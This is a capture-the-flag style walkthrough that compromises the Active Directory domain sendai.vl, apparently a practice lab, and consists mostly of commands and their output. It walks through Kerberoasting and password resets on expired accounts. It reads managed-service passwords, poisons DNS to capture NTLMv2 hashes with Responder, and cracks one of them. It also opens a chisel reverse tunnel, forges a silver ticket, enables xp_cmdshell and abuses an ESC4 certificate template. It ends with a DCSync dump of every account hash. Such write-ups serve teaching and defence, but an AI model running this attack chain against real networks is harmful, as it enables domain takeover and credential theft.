59867/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
59897/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
59920/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Service enumeration

DNS

Not vulnerable to Zone Transfer AXFR

SMB

Domain SID: S-1-5-21-3085872742-570972823-736764132

Server allows null session authentication (Medium )
Server allows guest session authentication (Medium)
- SID Brute forcing enumeration returned a list of valid domain users.
- Elliot.Yates and Thomas.Powell returned STATUS_PASSWORD_MUST_CHANGE

LDAP

Thomas.Powell does not have vulnerable ADCS template
Elliot.Yates does not have vulnerable ADCS template

Kerberoasting attack

nxc ldap 10.10.65.121 -u Thomas.Powell -p 'Password123!' --kerberoast kerberoast.hashes
SMB         10.10.65.121    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP        10.10.65.121    389    DC               [+] sendai.vl\Thomas.Powell:Password123! 
LDAP        10.10.65.121    389    DC               Bypassing disabled account krbtgt 
LDAP        10.10.65.121    389    DC               [*] Total of records returned 5
LDAP        10.10.65.121    389    DC               sAMAccountName: mgtsvc$ memberOf: CN=Remote Management Users,CN=Builtin,DC=sendai,DC=vl pwdLastSet: 2023-07-11 09:06:05.143133 lastLogon:<never>
LDAP        10.10.65.121    389    DC               $krb5tgs$18$mgtsvc$$SENDAI.VL$*sendai.vl/mgtsvc$*$6ed01fd1ecee490f551d5ccf$630b14e25f03bad3f22e706306db541144c138ab0255f864da98a09ff07a2430f8e400b6886baf70673f299ee7c3db3d5c5560120311629041e446c0253078a3c22a6a8ca7c9e79c42afd17384274066dfe967fc3ea29ddc6e6756b47ace6e1fe4e020eab21411d2d66a05b690928ff4418b00da847f07d991f43da01a572f7743253176f2a9aa585bf4d84552d688a396c360e993526732cd617ae115358c4f27421848289924e99654a51f73879dd5a7209ded6eef3977220d6cb07d2adab20e337056d6d96f7516c273e09d2255a6930419e2c2ec8a4221482ece01111d029600a2c2fc3ec736a625781c88b43ec05a5cef4b3051a3a2b17ca68a4defabd3ea60fda2deb559b45101cea1129bf86570058a89d36184e98e36b1888e7e576df0de42826a71c874c7795635d8b7182bbeb63c2430a65c6029d7308995e9c27a96e741cea1d69c48416c7fdd6d1dafd581d27751c790bf0ff692b340620d1c184b6f34771fa3fe9df4361b2d76f5b1f3425923299bc2ec9b47d2c4fbc9f8855dca948f970ec22d7f7c5c0f204ab09df1ed1c6be0984c58c9929b5f5496100af2328e3d70e5479437a204135b075238ecf05bd518195b3288db418ea8bb5ca37ae9e0e28009a4e9cf194e153f2b8edd2e35f79396a2e28a8d0b231f4b1b643d56e1ea2179f34e3a070e046a7f704f7f6d9b5c0056cf0a73ef6198fdb445b76c9840930e8dd310d14a8e6d1a937d01b3d9a583014b2d110357b932ab6ea62a23eed0e9703bee6da696afb669deadd264a53a97485684b15f58ab8b928bd8747f041b968d25daa0bf27c308585dc1c2bcb262742766822a3c3c44b56aacb2200d8cd9c22360e8286d191d8b51a706cd110297cc52c54931f72e19f69456b9e097a51070a740e706833a5a3cfd26a0784d93d4bd45cebe51727029601dfc011646f9a4f79539bd45345516c8e89857f6b5f176d7d85e760913647325f6df5e284ad2bf098c12d030429ee60d4b88c456102888dd6ecce13ff354123dc31d489224bd1e2618193fe859c97de0b01cd4409bedf1246ebac76d0cd15e00c782cf17e5f9fe7e13b59b054b153ced54398ba10ec3e8273de1ba3a6489d8a48bbacc980f399582c4d4233217fd91b774c52852a00709fb5541474ded26ab901e2bb46a22d39154ed3ec4228ec78317ba29b9779ce65b7498811082b7b8eedadb476735455aa676361a28904221d3fa3faf8df16674bb932b092333dbde1f63cf6afa54ab72946d653bc1a182b4ea8f9eb94e10899ebc6ad407cb68b47f757f46ac9255c4be017dc4a8152846c2728d351281e3bcf4da2173c77c67d294254049a4117817f918e0aa20fc0f4a4071fba5850035b538cf15e62706c6f66edf701e305d24bf030dbf42c29bd13bef1d4e951240f18653328137833b9af195e4e2b60350c972ca1f2834a6b75ad1385128c1d5c3bc701f61eb8936b902bf1e4a822237507df1a49ea226e0b525a6a9596f5fdc5a006a1a181a6f7a75a87e055b3a7ddc7fba02483449b457c0c6fe2302d6e8cba568b14335bc34638f8438
LDAP        10.10.65.121    389    DC               sAMAccountName: sqlsvc memberOf:  pwdLastSet: 2023-07-11 05:51:18.413329 lastLogon:2025-04-07 14:51:34.464169
LDAP        10.10.65.121    389    DC               $krb5tgs$23$*sqlsvc$SENDAI.VL$sendai.vl/sqlsvc*$95b23428cf862d0e6700ed746da29d63$42e2f8c6b4cba6064ed698af624f81f4fabc184fa7058a006456abaea4ee525cefcfe953a54ddf6b4dc7fce0b400a5cf827333ee33ddccb63b8b9bd7aec2a1e0684dbc1ae9228a7f5ef19722d8062e2b2f0f130842991f3dc7ab00023a6fe17d4914999b73a91c019b3c813fcca2a3f0c145314e92702729011641f9c952ddc5914268a01260a33f35916b917e6e300c7702164d20fd3170d1663809471845d3e01e5b68940f578f182af71f0d3d26cc3764d3897f2aca51d62986c17577b7f1361d2d030da717c44f55a50cb97ffb228c8aad67d7696913bf4428c5519e3c13b0f70bad242f8422e2341521c31d2ccaead66f88555bf3b0909df9525fef82ae422b6d4d752bfe9cbfdc5886263e2e754bba5df6a1f761e0cce924b68d1f5dd24a713a575593561eb94d20d5e2273f6bb2afdcc5f0bfe1a5afe84ae459b1ad26b2812e0455154d01f2e42cca2f69d495385a757d859245df080c76ddf0f4703dec755ba4560b54038380451964740fcf20b785477a9326833b821c7574b76ae3320c5fe2511ea9df87dbd5dab4fa2e5e6e1e4250fff1d1fe072b1e46c9bc4a4892184f5495fda6ba854f0a9a16681e1f4078bcbf7353f5017bd6e7fa1cec2adc2f2bba08c5b7754460c2a7de421eb84677bca999622a70c27f571c275e018f4dc6d27fa9d44a6038c203f491bb77f9973566c9fae08b7a9f71cbded4fd11f229bb48951ebcefc8855b925712486a1079d290cd50bc5e5280778bfe9f8b83f178063ca884eb3377bcda3e3793e5d3acb3a5bf2403df903e369668ba13d979ec95287706efad000df8d1c27b6215751a396290f6b56387ebc1c1edc487338507362b4fd8ef71cf51cd9db011ac87c4d469b01b26ac6ad3a115994a4628222b0189920c8ffb49a3a9b7ec35787f0cccd51af96a029b333d3210dbba7a53b7c9af8d81b279bb687493b367affc9c5775114574244ff0f54cabb9979a238c1246fd303667d39aa887151542418efa80871f8453e583eae94b117eef8a94f5b25bbd73b741dd33518bf522620e173ad0c0d33576eeb11ed4b825c8eccb9ad0d358e43898c2efcb45e55250c038e7fd0a4e07b00e757d2cc29d707a91489c4b9a8ed8d725f82212b91c03bd281e7da299d3bab29f26436974050c2671ccb22cf54a6c759b0a27d8ba4f22a46e3ff4067fe276b0e413921f84c05075e95049f1e2fca45d6c2dff8639760344ac610b71c1c4667a31d766c3e03a829d7acd295244b3737136edf0950bb60370ef12c007372631ecd208d04b9c9770fb03bbc90ed1897fc9473f05a785497a421b58fdaa790c3315bd06a8d80a6e528f047c35932a188265028a73e15c306888100792b21e2040e99406f74e519c11811f848854576f6d48032f354077ba7751ff0ef517d18bab14014782cc3b8e2009d50f3c0b070f97ff72101a98a29a3598b368aaa3b218a9dde43957829f7080c597594009c7a2124aa32e0d122a8bcd1743dc3bfc0496f3e7cfcb0287250107b33f38904e2e6e8b075a327037607b81301b99e506280a588c6f0052ff4cef2d

Bloodhound enumeration

nxc ldap 10.10.65.121 -u Thomas.Powell -p 'Password123!' --dns-server 10.10.65.121 --bloodhound -c all
SMB         10.10.65.121    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP        10.10.65.121    389    DC               [+] sendai.vl\Thomas.Powell:Password123! 
LDAP        10.10.65.121    389    DC               Resolved collection methods: psremote, session, trusts, localadmin, group, acl, dcom, objectprops, container, rdp
LDAP        10.10.65.121    389    DC               Done in 00M 32S
LDAP        10.10.65.121    389    DC               Compressing output into /home/Intrusionz3r0/.nxc/logs/DC_10.10.65.121_2025-04-07_152023_bloodhound.zip

HTTP

Finding service.sendai.vl

❯ ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H  'Host: FUZZ.sendai.vl' -u https://sendai.vl/ -fs 703

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://sendai.vl/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.sendai.vl
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 703
________________________________________________

service                 [Status: 200, Size: 4189, Words: 1104, Lines: 91, Duration: 187ms]

Exploitation

Users with STATUS_PASSWORD_MUST_CHANGE

❯ nxc smb 10.10.65.121 -u users.txt -p '' | grep 'STATUS_PASSWORD_MUST_CHANGE'
SMB                      10.10.65.121    445    DC               [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE 
SMB                      10.10.65.121    445    DC               [-] sendai.vl\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE

Changing the Users password

❯ impacket-changepasswd sendai.vl/Elliot.Yates@10.10.65.121 -newpass 'Password123!' -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Current password not given: will use KRB5CCNAME
[*] Changing the password of sendai.vl\Elliot.Yates
[*] Connecting to DCE/RPC as sendai.vl\Elliot.Yates
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.

❯ impacket-changepasswd sendai.vl/Thomas.Powell@10.10.65.121 -newpass 'Password123!' -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Current password not given: will use KRB5CCNAME
[*] Changing the password of sendai.vl\Thomas.Powell
[*] Connecting to DCE/RPC as sendai.vl\Thomas.Powell
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.

Path 1: Foothold via DACL

Either Thomas.Powell and Elliot.Yates has the same path to compromise MGTSVC$SENDAI.VL and are able to read msDS-ManagedPassword attribute.

Adding Thomas.Powell into admsvc group.

❯ bloodyAD -u Thomas.Powell -p 'Password123!' --dc-ip 10.10.65.121 add groupMember 'admsvc' 'Thomas.Powell'
[+] Thomas.Powell added to admsvc

Reading the mgtsvc$ 's msDS-ManagedPassword attribute.

❯ bloodyAD -u Thomas.Powell -p 'Password123!' --dc-ip 10.10.65.121 get object --attr 'msDS-ManagedPassword' 'mgtsvc$'

distinguishedName: CN=mgtsvc,CN=Managed Service Accounts,DC=sendai,DC=vl
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:c15a7132cd45d7e342dc14f29b50b54c
msDS-ManagedPassword.B64ENCODED: b5iv5Uc3ZyRhBaIWWQGpmxDTzIf4Eo8Pvuj4FwAdguz7ovDcAGblAj/51PuQHnq3CSTZ/ZdJROkw/sEQy+fvSphVWXfR/MG6IsqBp03chmOsugliIYtL4UtEdU0JHFETf8h2iWMs1off8282WKGDB5+HAuYPh1Oza+1QGy7uiOP16m3SNjC5XzbhXUoCv3/H3j2KH2jSwUG7naHNUkcoL0Cz5UqnVfZuXPGXZuzXHqHagwZAvsLmZ0KY+5AnbVeEoGHhpjhbGo5dlBM/udxlpGKD+GQEYoBiD1DE1GKhoZ9Gyi6lDQPfQ0RDUuemhTuz15LqXiTMC6S8oOJfE9Q5xA==

Winrm allowed

❯ nxc winrm 10.10.65.121 -u mgtsvc$ -H 'c15a7132cd45d7e342dc14f29b50b54c'
WINRM       10.10.65.121    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
WINRM       10.10.65.121    5985   DC               [+] sendai.vl\mgtsvc$:c15a7132cd45d7e342dc14f29b50b54c (Pwn3d!)

Path 2: Foothold via DNS Poisoning

The site issue DNS resolution which allows to create a fake computer and associated a malicious DNS to capture the NTLMv2

Checkig the MachineAccountQuota

❯ nxc ldap 10.10.65.121 -u Thomas.Powell -p 'Password123!' -M maq
SMB         10.10.65.121    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP        10.10.65.121    389    DC               [+] sendai.vl\Thomas.Powell:Password123! 
MAQ         10.10.65.121    389    DC               [*] Getting the MachineAccountQuota
MAQ         10.10.65.121    389    DC               MachineAccountQuota: 10

Creating a fake computer

❯ impacket-addcomputer sendai.vl/Thomas.Powell:'Password123!' -computer-name z3r0 -computer-pass Password123! -dc-ip 10.10.65.121
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account z3r0$ with password Password123!

Adding a malicious DNS

❯ python3 dnstool.py -u 'sendai.vl\z3r0$' -p 'Password123!' -r evil.sendai.vl -d 10.8.5.48 -a add dc.sendai.vl -dns-ip 10.10.65.121
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

Wait between 8 - 10 minutes to the server is able to spread the new configuration.

Capturing the NTLMv2 hash

sudo responder -I tun0
[sudo] password for Intrusionz3r0: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0
<SNIF>
[+] Listening for events...

[HTTP] NTLMv2 Client   : 10.10.65.121
[HTTP] NTLMv2 Username : SENDAI\websvc
[HTTP] NTLMv2 Hash     : websvc::SENDAI:521b32f46ea315bb:24C1C0CDFF3BB516F79639B3DA01AEE2:01010000000000001C4C3FD2F6A7DB010938B3C67A3ACFF600000000020008004D004E005700540001001E00570049004E002D004800340034004B0031004F0054004900540059003800040014004D004E00570054002E004C004F00430041004C0003003400570049004E002D004800340034004B0031004F00540049005400590038002E004D004E00570054002E004C004F00430041004C00050014004D004E00570054002E004C004F00430041004C000800300030000000000000000000000000300000C90663E9BAF7E6AF8B9894B5FCD33BFFF85F68807F8290BBB658CAC443DD21D00A001000000000000000000000000000000000000900260048005400540050002F006500760069006C002E00730065006E006400610069002E0076006C000000000000000000

Cracking the NTLMv2 hash

hashcat -m 5600 websvc.ntlmv2 /usr/share/wordlists/rockyou.txt
<SNIF>

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

WEBSVC::SENDAI:521b32f46ea315bb:24c1c0cdff3bb516f79639b3da01aee2:01010000000000001c4c3fd2f6a7db010938b3c67a3acff600000000020008004d004e005700540001001e00570049004e002d004800340034004b0031004f0054004900540059003800040014004d004e00570054002e004c004f00430041004c0003003400570049004e002d004800340034004b0031004f00540049005400590038002e004d004e00570054002e004c004f00430041004c00050014004d004e00570054002e004c004f00430041004c000800300030000000000000000000000000300000c90663e9baf7e6af8b9894b5fcd33bfff85f68807f8290bbb658cac443dd21d00a001000000000000000000000000000000000000900260048005400540050002f006500760069006c002e00730065006e006400610069002e0076006c000000000000000000:Diamond1

Post Exploitation

Path 1: Domain Compromise via MSSQL

Creating the tunnel

#Server
❯ ./chisel server --reverse --socks5 -v -p 1234
# Compromise server (target)
❯ *Evil-WinRM* PS C:\temp> ./chisel client 10.8.5.48:1234 R:socks

Finding sqlsvs plain text credentials credentials

The tester found sqlsvc plaintext credentials in c:\config\.sqlconfig with a MSSQL service account MSSQL/dc.sendai.vl

*Evil-WinRM* PS C:\config> type  .sqlconfig
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=SurenessBlob85;

Obtaining SID domain account

❯ impacket-lookupsid sendai.vl/Elliot.Yates:'Password123!'@10.10.125.227
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at 10.10.125.227
[*] StringBinding ncacn_np:10.10.125.227[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3085872742-570972823-736764132

Retrieving nt hash through plaintext password

❯ pypykatz crypto nt 'SurenessBlob85'
58655c0b90b2492f84fb46fa78c2d96a

Crafting silver ticket

❯ impacket-ticketer -nthash 58655c0b90b2492f84fb46fa78c2d96a -domain-sid S-1-5-21-3085872742-570972823-736764132 -domain sendai.vl -spn MSSQL/dc.sendai.vl Administrator  2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sendai.vl/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in Administrator.ccache
❯ export KRB5CCNAME=Administrator.ccache

Connecting and enable xp_cmdshell

❯ proxychains impacket-mssqlclient -k DC.sendai.vl 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (SENDAI\Administrator  dbo@master)> enable_xp_cmdshell
INFO(DC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(DC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SENDAI\Administrator  dbo@master)>

Abusing seImpersonatePrivilege to compromise domain

Path 2: Domain Compromise via ADCS

Finding clifford.davey plaintext credentials

*Evil-WinRM* PS C:\Temp> Import-Module .\PrivescCheck.ps1
*Evil-WinRM* PS C:\Temp> Invoke-PrivescCheck
<SNIF>
Name        : Support
DisplayName :
ImagePath   : C:\WINDOWS\helpdesk.exe -u clifford.davey -p RFmoB2WplgE_3p -k netsvcs
User        : LocalSystem
StartMode   : Automatic
<SNIF>

Attacking ESC4 Misconfiguration (Automatic)

To make a template vulnerable, the following attributes need to be modified with the specified values:

Grant Enrollment rights for the vulnerable template.
Disable the PEND_ALL_REQUESTS flag in mspki-enrollment-flag to deactivate Manager Approval.
Set the mspki-ra-signature attribute to 0 to disable the Authorized Signature requirement.
Enable the ENROLLEE_SUPPLIES_SUBJECT flag in mspki-certificate-name-flag to allow requesting users to specify another privileged account name as a SAN.
Set the mspki-certificate-application-policy to a certificate purpose for authentication:
- Client Authentication (OID: 1.3.6.1.5.5.7.3.2)
- Smart Card Logon (OID: 1.3.6.1.4.1.311.20.2.2)
- PKINIT Client Authentication (OID: 1.3.6.1.5.2.3.4)
- Any Purpose (OID: 2.5.29.37.0)
- No Extended Key Usage (EKU)

❯ certipy-ad template -u 'clifford.davey' -p 'RFmoB2WplgE_3p' -dc-ip 10.10.125.227 -template SendaiComputer
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating certificate template 'SendaiComputer'
[*] Successfully updated 'SendaiComputer'

Retrieving Adminsitrator's certificate

❯ certipy-ad req -u 'clifford.davey' -p 'RFmoB2WplgE_3p' -dc-ip 10.10.125.227 -ca sendai-DC-CA -template SendaiComputer -upn Administrator 2>/dev/null
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Retrieving Administrator's NT hash

❯ certipy-ad auth -username Administrator -dc-ip 10.10.125.227 -pfx administrator.pfx -domain sendai.vl 2>/dev/null
[*] Using principal: administrator@sendai.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sendai.vl': aad3b435b51404eeaad3b435b51404ee:cfb106feec8b89a3d98e14dcbe8d087a

Requesting an Ticket Granting Ticket to kerberos authentication

❯ impacket-getTGT sendai.vl/administrator@10.10.125.227 -hashes aad3b435b51404eeaad3b435b51404ee:cfb106feec8b89a3d98e14dcbe8d087a
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in administrator@10.10.125.227.ccache

Performing DCSync Attack agains domain controller.

❯ KRB5CCNAME=administrator@10.10.125.227.ccache impacket-secretsdump -k -no-pass dc.sendai.vl -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cfb106feec8b89a3d98e14dcbe8d087a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9eb8311492c343dda00353551e8139c:::
sendai.vl\sqlsvc:1104:aad3b435b51404eeaad3b435b51404ee:58655c0b90b2492f84fb46fa78c2d96a:::
sendai.vl\websvc:1105:aad3b435b51404eeaad3b435b51404ee:53e938166782a44e241beaf02d081ff6:::
sendai.vl\Dorothy.Jones:1108:aad3b435b51404eeaad3b435b51404ee:f2eb7a2c6dd45d09d2fb286427310ab4:::
sendai.vl\Kerry.Robinson:1109:aad3b435b51404eeaad3b435b51404ee:e869ae31413c9fe641fe6dd821ff41a4:::
sendai.vl\Naomi.Gardner:1110:aad3b435b51404eeaad3b435b51404ee:5787671779f39832379c2f1f17ed330c:::
sendai.vl\Anthony.Smith:1111:aad3b435b51404eeaad3b435b51404ee:d4d0cf817328027f80f3e3d7a9fdfb8a:::
sendai.vl\Susan.Harper:1112:aad3b435b51404eeaad3b435b51404ee:b0e19c54d92d45a9a194dc06fbfc6188:::
sendai.vl\Stephen.Simpson:1113:aad3b435b51404eeaad3b435b51404ee:f7c556037f989ee74a5ebf29cf04f15c:::
sendai.vl\Marie.Gallagher:1114:aad3b435b51404eeaad3b435b51404ee:3aff33bedfdada08baebfa52cee187d4:::
sendai.vl\Kathleen.Kelly:1115:aad3b435b51404eeaad3b435b51404ee:edae39c82dea107d7c2bd1dcb5b10bf5:::
sendai.vl\Norman.Baxter:1116:aad3b435b51404eeaad3b435b51404ee:cb3d9487230e44e11747c549bbfeda64:::
sendai.vl\Jason.Brady:1117:aad3b435b51404eeaad3b435b51404ee:5dfdfee0fd6859f189e46d2355487b81:::
sendai.vl\Elliot.Yates:1118:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
sendai.vl\Malcolm.Smith:1119:aad3b435b51404eeaad3b435b51404ee:074a36e90a6fe3c1004cdd6b99aa068d:::
sendai.vl\Lisa.Williams:1120:aad3b435b51404eeaad3b435b51404ee:4210e68078724566518b8ad3f197a4a6:::
sendai.vl\Ross.Sullivan:1121:aad3b435b51404eeaad3b435b51404ee:51c235bbb7188c6181f44673ae5ef75c:::
sendai.vl\Clifford.Davey:1122:aad3b435b51404eeaad3b435b51404ee:13cee2652d9af0b63e3ebda229edf2ed:::
sendai.vl\Declan.Jenkins:1123:aad3b435b51404eeaad3b435b51404ee:11b192a7320a24b39492af79090fbc83:::
sendai.vl\Lawrence.Grant:1124:aad3b435b51404eeaad3b435b51404ee:9b912c25ef31bf4cdecbfea1381fbdd1:::
sendai.vl\Leslie.Johnson:1125:aad3b435b51404eeaad3b435b51404ee:d3d65c0ec99d83e2392be353f9fef684:::
sendai.vl\Megan.Edwards:1126:aad3b435b51404eeaad3b435b51404ee:e11dab55fa474c3465a133a50e439ebe:::
sendai.vl\Thomas.Powell:1127:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:336ce5de80f66e34727ff2459bb6fbd8:::
mgtsvc$:1130:aad3b435b51404eeaad3b435b51404ee:c15a7132cd45d7e342dc14f29b50b54c:::